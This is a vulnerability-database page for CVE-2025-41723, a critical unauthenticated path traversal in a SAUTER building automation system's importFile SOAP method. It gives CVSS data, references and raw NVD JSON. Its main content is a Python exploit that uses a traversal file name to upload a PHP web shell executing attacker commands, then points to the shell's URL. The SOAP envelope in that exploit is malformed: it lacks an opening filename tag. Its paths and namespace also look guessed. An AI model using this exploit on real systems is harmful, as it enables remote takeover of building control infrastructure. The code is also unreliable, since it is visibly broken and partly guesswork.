CVE-2025-41723

Description

The importFile SOAP method is vulnerable to a directory traversal attack. An unauthenticated remote attacker bypass the path restriction and upload files to arbitrary locations.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

SAUTER楼宇自动化系统受影响版本（具体版本请参考官方CSAF公告 vde-2025-060）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-41723 PoC - SAUTER importFile SOAP Method Directory Traversal
# Exploits the importFile SOAP method to upload files to arbitrary locations

import requests
from xml.sax.saxutils import escape

TARGET_URL = "https://target-sauter-system/soap/importFile"
# Traversal payload to escape the restricted upload directory
# e.g., upload a web shell to the web root
MALICIOUS_FILENAME = "../../../../var/www/html/shell.php"

# Malicious PHP web shell content
FILE_CONTENT = """<?php
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>"""

# Construct SOAP envelope with directory traversal in filename
soap_envelope = f"""<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <soapenv:Body>
    <importFile xmlns="http://schemas.sauter.com/building/automation">
      {escape(MALICIOUS_FILENAME)}</filename>
      <fileData>{escape(FILE_CONTENT)}</fileData>
    </importFile>
  </soapenv:Body>
</soapenv:Envelope>"""

headers = {
    "Content-Type": "text/xml; charset=UTF-8",
    "SOAPAction": '"importFile"'
}

# Send the malicious SOAP request - no authentication required
response = requests.post(TARGET_URL, data=soap_envelope, headers=headers)

if response.status_code == 200:
    print(f"[+] File uploaded successfully via path traversal!")
    print(f"[+] Access web shell at: {TARGET_URL.rsplit('/', 1)[0]}/shell.php?cmd=id")
else:
    print(f"[-] Exploit failed. Status code: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41723
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41723
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41723/
[4] VulDB https://vuldb.com/cve/CVE-2025-41723
[5] https://sauter.csaf-tp.certvde.com/.well-known/csaf/white/2025/vde-2025-060.json

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41723", "sourceIdentifier": "[email protected]", "published": "2025-10-22T07:15:33.820", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The importFile SOAP method is vulnerable to a directory traversal attack. An unauthenticated remote attacker bypass the path restriction and upload files to arbitrary locations."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-35"}]}], "references": [{"url": "https://sauter.csaf-tp.certvde.com/.well-known/csaf/white/2025/vde-2025-060.json", "source": "[email protected]"}]}}